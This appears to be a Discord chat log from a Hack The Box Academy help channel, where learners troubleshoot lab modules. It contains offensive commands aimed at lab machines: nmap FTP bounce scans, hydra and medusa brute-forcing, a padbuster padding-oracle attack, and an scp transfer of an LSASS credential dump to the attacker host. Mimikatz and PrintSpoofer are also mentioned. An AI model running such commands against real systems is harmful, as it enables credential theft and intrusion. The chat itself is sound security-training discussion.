that should be the first thing you try after the rdp failed 🤣
Why did not you tell me this Before
it would be way easier to debug knowing if you even have a connection to the target or not
i didn't put "nmap" in that sentence so my bad (jk)
just noticed your ip that's the issue, for listenaddress= use the given target machine ip not yours 🤣
NO WAYY
like if you think about it the how can you set the listen address to your kali because the given target doesn't have access or privilege to do that
no worries everyone makes dumb mistakes
Hmm that is giving me the same error. I think it may be a problem with my VPN connection. I'm able to hit the server with ping and nmap, but my device IP is not in the same subnet. I imagine that may cause issues with permissions. Spinning up a VM now in the HTB subnet.
has anyone ran into issues interacting with machines over SSH? I'm consistently getting them to hang to the point of needing to kill the terminal tab anytime they have to send more than a few bytes' worth of data
I think I checked just about everything on my side; I have a stable connection, VPN is working too, ping and traceroute aren't showing any issues either (fwiw, this is the skills assessment for buffer overflows on x86 Linux)
Got the flag 😂😂😂😂😂
This is the Certified dumb moment for me I will remember this whole life
you could try mounting with ||sudo|| privilege
can anyone kindly help me with the log rotate section of linux priv sec module?
How to take notes most effectively? I use Obsidian and is it good if I take notes like this and manage my notes in tree structures?
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
give this a try maybe #resources-tools message
hey did you solve this im doing this right now
not yet
nvm just solved it
can i dm u?
yeah sure
update: turns out that the VPN must have not been working correctly - I switched to the TCP variant and it instantly helped, just putting it out if anyone ever faces a similar issue
Hey guys,
I'm stuck on the Attacking Enterprise Networks - Lateral Movement module. I have added the ilfserveradm user to the admin group but I still can't run PS nor mimikatz as Administrator. Ilfserveradm credentials don't seem to work :(. Not sure if I'm missing something..
There are quite a few times where the module instructs you to go to the bottom to start the target; if I'd like to suggest the ability to start the target from the sidemenu (where I can start the pwnbox) - where would I do that ?
The GPP-Password lab does not seem to execute the specified powershell script in the Windows Attack and Defense module, is there any help available? 🙂
Re-importing the module did the trick 🙂
I have a question working on a lab I used to copy paste the target from the module into the HTB machine on the site but now I can't any solutions to this
.\ runs the file it as a script :) You can do Import-Module Get-GPPPassword.ps1, then run the command Get-GPPPassword :)
Just a sanity check, but have any of you recently done sqlmap essentials recently, because I just found a flag from the flag5 table that I couldn't submit.
I ended up changing one of the characters in the flag text to make more sense, and that was submitted just fine. ||something_something_r19k_something_something -> something_something_r15k_something_something||
You're most likely not allowing the machine to read your clipboard. I had that issue one time as well
ATTACKING COMMON SERVICES: Attacking FTP
Question 2:
What username is available for the FTP server?
After nmap scan anonymous login is allowed, so running this command
nmap -Pn -v -p80 -b anonymous:@<target IP:2121> <pwnbox tun0 ip>
OR
nmap -Pn -v -p22 -b anonymous:@<target IP:2121> <pwnbox tun0 ip>
After running above gives this :
Connected:Login credentials accepted by FTP server!
Initiating Bounce Scan at 05:13
Your FTP bounce server doesn't allow privileged ports, skipping them.
And you didn't want to scan any unprivileged ports. Giving up.
QUITTING!
Can anybody help me where I am wrong?
Did you try any other tools?
check the anonymous access of FTP server.
medusa -u anonymous -P pws.list -h <target IP> -n 2121 -M ftp
Got the password of the anonymous user but results the same thing
medusa?
what resources are given to you in the module to use?
user.list and pws.list
Problem is when trying to login in with normal or bounce back in the ftp it rejects even with valid creds
Don't know! -_-
Have you find the valid creds ?
yes for the anonymous:lxxxxxxl
something like this
Nope, With this files user.list and pws.list .
ok got in line...
Is it supposed to take very long?
77 users vs 333 passwords combo
ok
Was it a time based sql attack? I’ve had that happen on those before when the connection is unstable
I found the user name by hit and trial from the list but to find its corresponding password used this:
hydra -l xxxx -P pws.list ftp://<target ip>:2121 -V
But it gives no password..
What I am doing wrong?
im guessing u got the wrong username
But academy accepted the user name in the second question
dm me
not too sure, was not running any verbosity, but I used the -D -T -C flags after enumerating for the specifics
just went back to the module ur using the wrong password list
@short hare have u checked the ftp service using anonymous access ?
in a time based SQL attack the tool measures how long it took the server to answer to extract each character of the flag one by one. This is something heavy dependent on a stable internet connection and I think I had the same issue at the time where it would return the wrong character here and there because of that.
right, thanks for the explanation. Just found it weird.
yes
brute forced it and got the password for anonymous user
anonymous user doesn't need a password
Connections are OK and target is LIVE but even after that
u didn't specify the port
I really don't know what is going on
refresh the page and check if the machine is still runnning
also vpn connection
Don't do ctrl-z
You're probably still connected to ftp in a different background session
Ping the ip
using PWN box
refreshed both pwn and target but same thing
ok
but after nothing is happening
pinged and it's live
You are backgrounding the processes without knowing what it's actually doing
Try
ftp anonymous@ip port
It replies like that
ftp: anonymous@10.129.226.166: Name or service not known
hey hey now it's connected
Your old target probably died
seriously just tried few minutes back it refused
no rested the target and tried
Also check your screenshot this looks like you may have typoed the old ip
Hi anyone done with zipping machine?
Okay thanks
Also: if you're trying to close out a connection or stop a process do ctrl-c
ok will keep that in mind
Solved
Thanks for the support..!!
@fathom pendant @coarse void @silver mesa @tidal mango
hi guys i am stuck on this question "using the skills acquired in this and previous sections, access the target host and search for the file named 'waldo.txt' " it is on windows command line module
i can't find waldo.txt anywhere
any tips or help?
use the find command
i have used " where /R C:\ waldo.txt
but it's shown could not find files for the given pattern(s).
i fill the blank answer with that result but still not the right answer
yes it can. Still need the right port though if its not 21
I get the result with the same command
I just finished the sqlmap skills assessment, I managed to get the ||tamper script || mostly with pot luck, is there any way to narrow down which one to use?
Hey French. Did you finish the SQLi module before that?
I did yes
Can I please DM u regarding the assessment?
sure
Thanks
hey guys, little stuck on the payload & shells module, specifically at the part where it concerns PHP web shells -- anyone able to help me out in dms?
tl;dr is that my website does not seem to recognise the directory on the rconfig server despite the shell file showing as uploaded on the database
never mind i am insanely stupid
Hey All, Could you help me with completing HTTPS/TLS attack skills assessment
What exactly is not working?
hey , on windows priv esc , Citrix Breakout section Im getting an error trying to import a module : PS C:\Users\pmorgan\Desktop> Import-Module .\PowerUp.ps1
error : import-module : the specified module ‘PowerUp.ps1’ was not loaded because no valid module file was found in any module directory
Hi, currently working on Login Brute Forcing https://academy.hackthebox.com/module/57/section/516
Skills Assessment -Service login
I have found the employee and I created users list with username anarchy and passwd list with cupp.
Im doing mistake with filtering passwords according to conditions. can any help me with this
do u have any idea ?
it's about the second question of citrix section : Submit the Administrator's flag from C:\Users\Administrator\Desktop
I got the token but despite of what combination I give. I'm unable to decode the token
padbuster http://94.237.59.206:43498/token ||"0e0d74356da663454101d805584b6190eb57e7e30d9817ecfbf7973c9ab5df54f46a586de5c8693203896946088172a3"|| 16 -encoding 2 -cookies ||"token=0e0d74356da663454101d805584b6190eb57e7e30d9817ecfbf7973c9ab5df54f46a586de5c8693203896946088172a3||"-error " Decryption Error. Invalid Token! " -usebody
This is what I'm using
Any one
hi
hmmmm, cant dump NTDS with the created golden ticket, i need the hash of user "bross" -> https://academy.hackthebox.com/module/143/section/1508
Look at the options of padbuster again carefully.
You're trying to authenticate with CME to a user that doesn't exist. Try to instead use your created ticket with a different tool.
hmmm which one do you have in mind when dumping NTDS
could you let me know what I'm missing
Hello everyone. I'm stuck in the last 2 questions of AD Skill_2: Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host.
I have the credentials of the user with GenericAll user and I try to ACL abuse but PowerView module doesn't work... I try the module in MS01, SQL01 and my kali using proxychains but all times the same error.
Can anyone to help me?
dm
<@&861185840277487616> also in #cpts #cwes and #858470491676737536
After SELinux enforcing it blocks network interfaces
I have installed SELinux on an Ubuntu Pro Server with the following packages:
policycoreutils, selinux-utils, selinux-basics
The problem appears when I set SELinux policy to “enforcing”. My system loses network capabilities; when I run ‘ip addr show’ the only interface displayed is the loopback interface
Did anyone experience the same?
How did you overcome it?
Thanks.
anyone has any mail password cracking bruteforce
ik half of the password
and the number of digits
on 2 words in the password are missing
it is my old ID
🤨
read the #rules keep asking for thing like that and you will get the 👢
Lol
read #welcome and #rules after that use /verify at #bot-commands and ask that at #1024429874246590575
Hi all
Could you please give me a hint where I can find the URL of the WordPress instance? (Attacking Common Applications
Attacking Common Applications - Skills Assessment II)
I done all another questions and skill assessments but still can't find this one
if you've answered the rest of the questions for that assessment then did you find the wordpress site?
also the answer format for this is http://(domain) with http:// and without the / at the end
u mean wp-admin?
how do I connect to the support chat , after pushing the 'contact support' button?
Need some help? Learn how to reach the support team on Academy.
by domain i mean the url
I'm working on Attacking Common Services Lab Hard. I was able to RDP into the target system with credentials I found. I then found an XML file containing a string in the format of a flag: "HTB_......." But that flag isn't accepted as the answer. Is it just a decoy flag?
Hello everyone
I have a problem, I'm going through the active directory module and there is such a problem. When I spawn instance and try to connect via rdp, I get such a black screen. At first I tried in my own kali, then I tried with attack box and restarted a couple of times
yep it's just HTB being evil
v
Haha nice, that's funny.
not sure if this will work but try with these 2 flag /cert:ignore /dynamic-resolution
omg,thanks,now working
nice 👍 👍
yeah its ok I found out what I was doing wrong it works like the VM provided in tryhackme
can you please explain exactly ? the link does not help. I see no option of sending a message
are you on academy or main platform?
read #welcome and #rules after that use /verify at #bot-commands to verify your account, this channel is for HTB academy
you are on HTB main platform
im a hacker
i'm a ass eater
I used Chisel and Proxychains and then RDPed into the Host, PowerView worked fine through GUI.
anyone there
AD Enumeration & Attacks - Skills Assessment Part II. ||There is literally nothing on the two users I can login as on the RDP, nothing on that computer||
how can i hack a website im just starting out
read the #rules keep asking for that and you will get the 👢
im trying to check the security of my school website and say it to the staffs i think it will be cool
sry and thanks
There's not much else to say here except apply the pillaging techniques from the module better 🤷♂️
the whole htb academy is available to teach you🙏
If I break into your house to tell you I broke in to your house, would you think that's cool?
helping out here is by all means good but there is a big difference between people that generally want to learn cyber security and the dumb dumb that keep spamming how to hack
why everybody laughing at me😢
that would be really funny
because that's a dumb ass question
thx
if i know u yes it would be
😢
lol
from the top down what question number is that?
i just wanted to learn cybersecurity why u trash on me?
💀 , I am going insane, ive extracted the SPN's and tried cracking them, then i tried authenticating to the different services using the credentials i already have, then i tried to get the SQL01 IP but I couldnt, then I tried to xfreerdp
Q6
ok hint try enum windows servers with the cred that you already have
if you want to learn cyber security, the last thing that you want to do is run around and ask questions like how to hack this or that website 🤣 no one cares or can confirm your intentions, but if you want to start here's some stuff to get you started
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
ok thx
There are like 1000 computers, like 7 with SPN enabled(None of which i was able to crack the password off), should I take a break or is there something obvious I dont see?
there is 3 target machine 🤣 also how the tf did you get 1000?
Weelelllelelel i mean domain computers
lmao
Importing powerview and running "Get-DomainComputer"
maybe try with something like ping sweep first next time 🤣
but still can you dm the output of that how tf did that give you 1000 machine??
bro im so dumb im stuck in this What is the name of the first section of this module? If you are using a translation solution while studying, please disable it temporarily to enter the first section's name in English.
Submit your answer here...
Table of Contents
that was quick
😅
each module is divided into sections(like topics)
ok
you just have to enter the name of the first ||section||
thx
Hey Guys I am new here
My name is Nithish
I want to become an Ethical Hacker
Can anyone guide from where to start ?
I am good at programming languages like Java and Python
yo @low swallow here is a good question if you want to get started 🤣
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
here is some additional resource for y'all
#modules message
I'm working on the Dynamic Port Forwarding with SSH and SOCKS Tunneling section of the Pivoting, Tunneling, and Port Forwarding module. I can't get dynamic port forwarding to work to be able to RDP into the target. I can't run any commands with proxychains, even though I ran the command ssh -D 9050 ubuntu@<TARGET IP> and the correct final line is in /etc/proxychains.conf. I have tried multiple VPN files (US Academy 1 and US Academy 3), but neither seems to work. Looking through the forums, it looks like lots of people ran into the same issue. Does anyone know of a workaround?
Trying from Pwnbox right now to see if that might help.
Same exact error on pwnbox
Never mind, I was able to figure it out. It was an error on my part. I didn't realize I had to stay SSHed into the ubuntu machine. I was running the ssh -D 9050 ubuntu@<TARGET IP> command and then killing the connection with the SSH server.
i am just looking for some help on the machine cozyhosting. i've gotten to the login page, unfortunately i don't know what to do next
Ask here #1147590465038844047
If you have no access, read and follow #welcome
thank you for the help. very appreciated
just curious, I'm not a content creator but are people allowed to stream the content of modules?
Only Tier 0
don't you hate when you get a right answer, and have no idea how you got it
Yesterday I got flag in a weird way
And yes I agree
I just got the right answer, but literally don't understand it, kicks chatgpts ass too
is there a better coding ai than chatgpt?
What module or question you are talking about
filter contents in linux basics
Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.
curl -s https://inlanefreight.com | grep -oE 'href="/[^"]+' | cut -d "/" -f 2 | sort -u | wc -l
is the code ChatGPT used, when I run it it returns 0
the correct answer is 34 lol
when ChatGPT ran the same code, they got 34.
Module: DACL Attacks I
Section: Granting Rights and Ownership
Question: Lilia has the WriteDacl access right over the account Kendra. Abuse this access right to gain access to the shared folder \DC01\Kendra and submit the contents of flag.txt as the answer.
I have added the write permission but I still cant perform dcsync. Is this a bug or am I doing something wrong?
ChatGPT does not run code, be wary when trying to do stuff like this
Hello. Please ask questions without revealing steps of the answer. Feel free to DM me.
Please I am just starting the academy and I have been stuck on this question (Service and Process Management) for two days now. I have tried all I know. Can someone lend a helping guide? Use the "systemctl" command to list all units of services and submit the unit name with the description "Load AppArmor profiles managed internally by snapd" as the answer.
Maybe easy method it create a shared folder inside virtual box from host to VM and import the file to host OS (windows) and add it as virtual drive
what steps have you tried so far?
I have tried this command: systemctl list-units type=service|grep Load AppArmor profiles managed internally by snapd
Also tried AppArmor
Answer should be apparmor.service from the information but it is wrong
it should be ||systemctl list-units --type=service||
Yesh. I used this and got the only AppArmor option as apparmor.service but still said its wrong answer
Any one here do attacking common applications module stuck on section "Other Notable Applications"
first question "Enumerate the target host and identify the running application. What application is running? "
what module are you working on and what section I might be able to help you
it's one of the honorable mentions.
I ended up opening it on windows. after downloading the .vhd I was able to mount it just using windows GUI. I dont recall having trouble with it windows recognized the data type and was just able to right click and mount it.
Right ya I actually did bruteforce the answer lol but Im still wondering how do you actually find it by enumerating the target. So far have not even seen the app mentioned in the enumeration ive done so far.
Hi @wheat garden . The module is "Service and Process Management". I just used the command : "systemctl list-units --type=service " and I got the answer this time
oh? I used nmap with -A. Just did it and got it.
Hi, I'm in module "Web Requests" -> "CRUD API". Anyone can help me please? I follow the steps but the ||JSON is void|| 😦
sure
Did you try the dislocker method in that article?
hello i make the skill assessment of the file inclusion , i have access to the admin panel but i dont find the other lfi can you give me hint .
yep that worked
can dm me if you still need help
Agree - "where" is the obvious one word command - not sure why the module won't accept that answer.
Yeah - I can't find the one word Splunk Command either that it will accept. I tried every Command mentioned in the modules
Take a look at Splunk's quick reference and think about what command might be useful here
https://docs.splunk.com/Documentation/Splunk/9.1.0/SearchReference/ListOfSearchCommands
Hi guys, I'm in Login Brute Forcing - Skills Assessment service login. I'm stuck on getting passwd for SSH.
So far, I tried
- created user list and passwd list
- filtered according to the condition.
Anyone, so I can clarify what mistake I'm making.
NVM, I got it.
Hello everyone, I'm in ATTACKING COMMON APPLICATIONS in the section Other Notable Applications. I'm trying to get the flag of the second question using CVE 2020-14*** with a Python script but it sees nothing, can anybody help me?
Read #welcome
there's literally a splash screen that explains everything when you join 
I don't get anything when I use this command
Maybe because you are not really familiar with the techniques and need more practice?
But that's exactly what the module is for. Train with it until you are really fit in it
Try
curl https://blog.inlanefreight.com
curl: (60) SSL: no alternative certificate subject name matches target host name 'blog.inlanefreight.com'
More details here: https://curl.se/docs/sslcerts.html
curl failed to verify the legitimacy of the server and therefore could not
establish a secure connection to it. To learn more about this situation and
how to fix it, please visit the web page mentioned above.
Attacking AD skill assessment part 2, I've looked into the ||SQL01|| host and I found nothing, I tried running ||Responder|| and got nothing, so I tried to enumerate the local host and found nothing of interest... I am stuck lol (Q8)
Yes...
But idk what more to enumerate? AAA
Mimikatz
But I tried responder and got nothing
This seems to be a problem with the SSL certificate on the website. Contact HTB support
do post-exploitation on SQL01 using mimikatz
I tried running ||scp lsass.dmp htb-student@172.16.7.240:/home/htb-student|| on the windows host in order to get the LSASS file, but I am not able to, it just hangs up...
I'm doing Kerberoasting - from Linux in Active Directory Enumeration & Attacks. I've cracked the TGS, but when I enumerate the user's groups via RPCClient to answer this question "What powerful local group on the Domain Controller is the SAPService user a member of?" it's not the correct group. I have tried running powershell commands via a credentialed crackmap session but they are not executing. Unsure of how to answer this, any pointers?
please, I get errors when running the "bundle install" command in this module to run the dnscat server thing: https://academy.hackthebox.com/module/158/section/1436
I can't post screenshots for some reason
head over to #welcome to verify your account
the ID is it for htb or htb academy account?
it’s for htb
I do have htb account but have never used it I've forgotten the creds and all so I'll do that later
.
it gives lots of errors, this is one: "Bundler::PermissionError: There was an error while trying to write to /var/lib/gems/3.1.0/cache/ecdsa-1.2.0.gem. It is likely that you need to grant write permissions for that path."
try running it with root permission
it says this "Don't run Bundler as root. Installing your bundle as root will break this application for all non-root users on this machine." so I got scared and canceled the process
you can check if you actually have permission to write to that directory with ||ls -l /var/lib/gems/3.1.0/cache/||
result
total 404
-rw-r--r-- 1 root root 413184 Sep 4 11:05 bundler-2.4.19.gem
you can try to install it to a different directory where you have write permission with ||bundle install --path ||
idk maybe I should just skip the module I don't want to alter my linux settings and stuff by doing these custom installs
Please, I’m having issues with SELinux. After setting it to enforcing mode and then rebooting, my machine can’t access the network interface, please help
I was stuck on this question for 50 hours
have you tried to use proxychains?
does somebody know a Windows util (.exe) that I can use to read a file??
Like via the attack host? (The one we are provided)
You should be using a vm for this exact reason. Take a snapshot then use the custom modules etc.
Hey, would I be able to get some help on Q7 of AD Enum Skills 2? Currently I have user the user for ||SQL01 and have used mssqlclient.py to log in and have SEImpersonate etc||, but I keep having errors with ||PrintSpoofer. Whenever I execute it with any command other than whoami, I get CreateProcessAsUser() failed. Error: 2||
Did you check Responder logs after running the responder? the path is ||/usr/share/responder/logs||
do you have the credentials to login first?
I tried ||PrintSpoofer64.exe|| and it worked, are you using the 64 bit version?
yeah I'm using 64 bit 🙂, I'm not sure what the issue is. I've tried running it directly in mssqlclient and also through a reverse shell. Does it matter where I've saved it?
Am I allowed to send photos here? or DM?
yeah you can send screenshots here, dm is also fine
Kali Linux
Responder ran for 0.00001 seconds lmao
I don't think there is a log
And I am running it on linux
can you send a screenshot
you have to run responder on linux host
There is a Responder for Windows but I think it's still in development iirc
Inveigh should be sufficient for any poisoning you need to do from Windows
So I have to use the Windows host as a pivot host then?
no one said anything about pivot hosts
But the thing is I ran Responder as the normal user before I even had access to this host
I don't know if you can poison from a nonadmin account because of what you need to have open but don't quote me on that